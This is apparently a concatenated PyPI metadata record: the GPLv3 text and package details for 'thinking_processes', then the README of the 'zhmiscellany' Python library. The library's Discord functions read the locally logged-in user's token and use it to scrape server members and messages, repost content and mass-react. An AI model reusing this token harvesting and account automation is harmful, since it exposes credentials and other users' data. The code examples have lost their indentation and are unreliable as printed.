Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. 
Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. 
A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. 
All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. 
When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. 
This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. 
b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. 
A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. 
But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. 
Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. 
If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. 
Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. 
The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. 
"Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. 
If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. 
If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. 
If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: <program> Copyright (C) <year> <name of author> This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 
This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see <https://www.gnu.org/licenses/>. The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read <https://www.gnu.org/licenses/why-not-lgpl.html>. | TOC, theory of constraints, current reality tree, evaporation cloud, conflict resolution diagram, thinking processes | [
"Intended Audience :: Education",
"Intended Audience :: Manufacturing",
"Intended Audience :: Science/Research",
"Intended Audience :: Other Audience",
"Topic :: Documentation",
"Topic :: Office/Business",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"graphviz",
"drawpyo"
] | [] | [] | [] | [] | twine/6.0.1 CPython/3.12.3 | 2026-02-20T09:37:20.608452 | thinking_processes-1.5.1.tar.gz | 50,912 | d8/a2/ef519c871956dcf71abf8ac0f0136bacb02c783f87700ddc4dc0efc6df51/thinking_processes-1.5.1.tar.gz | source | sdist | null | false | 7510de1d280bbd67badff2f04fb9069c | 5f49896f6d060c5ada11bb0dd4a8a6e56a1e97e892d0c18fc51e814212b6100f | d8a2ef519c871956dcf71abf8ac0f0136bacb02c783f87700ddc4dc0efc6df51 | null | [] | 216 |
2.1 | zhmiscellany | 6.5.6 | A collection of useful/interesting python libraries made by zh. | `zhmiscellany`,
=
An organized collection of unique and useful functions/classes/modules/bindings.
-
[Introduction](https://github.com/zen-ham/zhmiscellany/tree/master#Introduction)\
[Documentation](https://github.com/zen-ham/zhmiscellany/tree/master#Documentation)\
[](https://pepy.tech/projects/zhmiscellany) [](https://pepy.tech/projects/zhmiscellany) 
---
Introduction
===
Can be installed with `pip install zhmiscellany`
Supports Linux! (Some functionality reduced)
Currently, the package stands at 149 functions/classes/bindings across 15 modules.
The git repository for this package can be found [here](https://github.com/zen-ham/zhmiscellany). The docs also look nicer on github.
If you wish to reach out, you may add @z_h_ on Discord, or join [the server](https://discord.gg/ThBBAuueVJ).
Believe it or not, this package is not a monolith; I've split off some functionality into a handful of other packages to keep zhmiscellany from becoming too bloated: [zhmiscellanygsudo](https://pypi.org/project/zhmiscellanygsudo/), [zhmiscellanyocr](https://pypi.org/project/zhmiscellanyocr/), [zhmiscellanyrusteffect](https://pypi.org/project/zhmiscellanyrusteffect/).
---
Documentation:
===
[Usage-examples](https://github.com/zen-ham/zhmiscellany/blob/master/README.md#usage-examples) Usage examples for the discord module.\
[zhmiscellany.discord](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanydiscord) Functions for interacting with discord in various ways.\
[zhmiscellany.rust](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyrust) Various rust bindings aimed towards speed.\
[zhmiscellany.cpp](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanycpp) Various C++ bindings aimed towards speed.\
[zhmiscellany.macro](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanymacro) Functions with very high flexibility and speed for simulating interactions with mouse and keyboard.\
[zhmiscellany.fileio](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyfileio) Functions for interacting with local files, such as pickle, json and other file related functions I find useful.\
[zhmiscellany.string](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanystring) Functions for interacting with/generating strings that I find useful.\
[zhmiscellany.math](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanymath) Functions for making some calculations easier.\
[zhmiscellany.netio](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanynetio) Internet related functions that didn't make sense in any other module.\
[zhmiscellany.image](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyimage) Functions for quantifying and manipulating images.\
[zhmiscellany.list](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanylist) Functions for manipulating lists.\
[zhmiscellany.dict](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanydict) Functions for working with dicts.\
[zhmiscellany.processing](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanyprocessing) Functions for processing/multiprocessing using flexible high level ray wrappers, homebrew high level multiprocessing implementations, or in threads in a more straightforward way.\
[zhmiscellany.misc](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanymisc) Miscellaneous functions that didn't fit anywhere else. There's a lot of useful stuff here.\
[zhmiscellany.pipes](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanypipes) Classes and functions for effectively using pipes for IPC (Inter-Process Communication)\
[zhmiscellany.gui](https://github.com/zen-ham/zhmiscellany/tree/master#zhmiscellanygui) GUI related utilities for quickly adding visual components where it's needed.
Usage examples
===
A script that caches and prints out the user IDs of all the members in a server.
```py
import zhmiscellany
members = zhmiscellany.discord.scrape_guild(user_token=zhmiscellany.discord.get_local_discord_user()[0], guild_id='1162030646424768562', channel_id='1162031219471556629')
for member_id in members:
print(member_id)
```
#
A script that downloads all messages from a server and caches them (aka stores the data in json files), then downloads all the found media files, with print-outs of ETA, % complete, etc.
```py
import zhmiscellany, time, os
guild_channels = zhmiscellany.discord.get_guild_channels(zhmiscellany.discord.get_local_discord_user()[0], '1001978777892552884')
channels_message_data = []
for channel in guild_channels:
channels_message_data.append(zhmiscellany.discord.get_channel_messages(zhmiscellany.discord.get_local_discord_user()[0], channel['id']))
media_dir = r'/scraped_media'
urls = []
count = 0
for messages in channels_message_data:
for message in messages:
for attachment in message['attachments']:
if any(c in attachment['url'].lower() for c in ['.mp4', '.jpg', '.png', '.webp', '.mp3']):
count += 1
url = attachment['url'].split('?')[0]
urls.append(url)
total = count
eta_count = count
timestamps = []
count = 0
for url in urls:
count += 1
print(url)
print(f'{count}, {zhmiscellany.math.smart_percentage(count, total)}%, ETA {zhmiscellany.math.calculate_eta(timestamps, eta_count)}')
downloaded = (zhmiscellany.netio.download_file(url, f'{media_dir}\\{zhmiscellany.fileio.convert_name_to_filename(url)}', os.path.splitext(url)[1].lower()))
if downloaded:
timestamps.append(time.time())
else:
eta_count -= 1
```
#
A script that reposts messages you've sent in one channel to many other channels.
```py
import zhmiscellany, time
from_channel = '1122614930617683975'
post_channels = ['880703742096326677', '1141178363885670505']
amount_of_messages = 3
messages = zhmiscellany.discord.get_channel_messages(user_token=zhmiscellany.discord.get_local_discord_user()[0], channel_id=from_channel, limit=amount_of_messages, use_cache=False)
messages.reverse()
for channel in post_channels:
for message in messages:
if message['author']['id'] == zhmiscellany.discord.get_local_discord_user()[2]:
content = message['content']
attachments = []
for i in message['attachments']:
attachments.append(i['url'])
if len(attachments) > 0:
if len(content) > 0:
content = f'{content} {" ".join(attachments)}'
else:
content = " ".join(attachments)
zhmiscellany.discord.send_message(zhmiscellany.discord.get_local_discord_user()[0], content, channel)
print(content)
time.sleep(1)
```
#
A script that reacts to a bunch of messages in multiple channels, with print-outs of ETA, % complete, etc.
```py
import zhmiscellany, time
channel_ids = ['926310071435145256', '880703742096326677']
channels_message_data = []
amount_of_messages = 100
emojis = ['🇦🇺']
for ide in channel_ids:
channels_message_data.append(zhmiscellany.discord.get_channel_messages(user_token=zhmiscellany.discord.get_local_discord_user()[0], channel_id=ide, limit=amount_of_messages, use_cache=False))
ids = []
count = 0
for messages in channels_message_data:
for message in messages:
count += 1
ide = [message['id'], message['channel_id']]
ids.append(ide)
total = count
eta_count = count
timestamps = []
count = 0
for ide in ids:
count += 1
print(f'{count}, {zhmiscellany.math.smart_percentage(count, eta_count)}%, ETA {zhmiscellany.math.calculate_eta(timestamps, eta_count)}')
zhmiscellany.discord.add_reactions_to_message(zhmiscellany.discord.get_local_discord_user()[0], emojis, ide[1], ide[0])
timestamps.append(time.time())
```
#
A script that prints out the URLs to all the attachments on a message.
```py
import zhmiscellany
message_url = 'https://discord.com/channels/1001978777892552884/1064070189324435466/1162434625092718623'
message = zhmiscellany.discord.get_message(zhmiscellany.discord.get_local_discord_user()[0], zhmiscellany.discord.message_url_to_ids(message_url)[1], zhmiscellany.discord.message_url_to_ids(message_url)[2])
for attachment in message['attachments']:
url = attachment['url']
print(url)
```
---
`zhmiscellany.discord`
---
`zhmiscellany.discord.add_reactions_to_message()`
---
`zhmiscellany.discord.add_reactions_to_message(user_token, message_url, emojis)`
Reacts to a message with the given emoji(s).
example:
```py
import zhmiscellany
zhmiscellany.discord.add_reactions_to_message(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
emojis=['🦛', '🇦🇺'],
channel_id='263894734190280704',
message_id='263894769158062082'
)
```
#
`zhmiscellany.discord.get_channel_messages()`
---
`get_channel_messages(user_token, channel_id, limit = 0, use_cache = True)`
Gets any amount of messages from a channel.\
Can also cache the data locally, so that it won't have to re-download them when run a second time.
example:
```py
import zhmiscellany
last_1000_messages = zhmiscellany.discord.get_channel_messages(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
channel_id='263894734190280704',
limit=1000,
use_cache=False
)
```
#
`zhmiscellany.discord.get_local_discord_user()`
---
`zhmiscellany.discord.get_local_discord_user()`
Gets info about the local user, allows code to be run without needing to find your user token every time.\
So if the user is logged into discord in the app or in the browser (on Windows), this function can return the data, which can really streamline things.
example:
```py
import zhmiscellany
user_data = zhmiscellany.discord.get_local_discord_user()
user_token = user_data[0]
```
#
`zhmiscellany.discord.get_guild_channels()`
---
`zhmiscellany.discord.get_guild_channels(user_token, guild_id, use_cache=True)`
Gets a dict of all the channels in a server. This one can also cache the data locally, so that it runs instantly the second time around.
example:
```py
import zhmiscellany
guild_channels = zhmiscellany.discord.get_guild_channels(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
guild_id='880697939016695850',
use_cache=True
)
channel_ids = [channel['id'] for channel in guild_channels]
```
#
`zhmiscellany.discord.send_message()`
---
`zhmiscellany.discord.send_message(user_token, text, channel_id)`
Sends a message in a channel.
example:
```py
import zhmiscellany
zhmiscellany.discord.send_message(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
text='Hello, every nyan!',
channel_id='263894734190280704')
```
#
`zhmiscellany.discord.get_message()`
---
`zhmiscellany.discord.get_message(user_token, channel_id, message_id)`
Gets a message from a channel.
example:
```py
import zhmiscellany
message = zhmiscellany.discord.get_message(
user_token=zhmiscellany.discord.get_local_discord_user()[0],
channel_id='263894734190280704',
message_id='263894769158062082'
)
content = message['content']
```
#
`zhmiscellany.discord.ids_to_message_url()`
---
`zhmiscellany.discord.ids_to_message_url(channel_id, message_id, guild_id = None)`
Turns ids into a message url. Direct messages don't have a guild id, so the guild_id argument is optional depending on whether the message is in a guild channel or a DM channel.
example:
```py
import zhmiscellany
message_url = zhmiscellany.discord.ids_to_message_url(
guild_id='880697939016695850',
channel_id='880703742096326677',
message_id='880726566118768640'
)
```
#
`zhmiscellany.discord.message_url_to_ids()`
---
`zhmiscellany.discord.message_url_to_ids(message_url)`
Turns a message URL into its respective IDs.
example:
```py
import zhmiscellany
message_ids = zhmiscellany.discord.message_url_to_ids(
'https://discord.com/channels/880697939016695850/880703742096326677/880726566118768640'
)
guild_id = message_ids[0]
channel_id = message_ids[1]
message_id = message_ids[2]
```
#
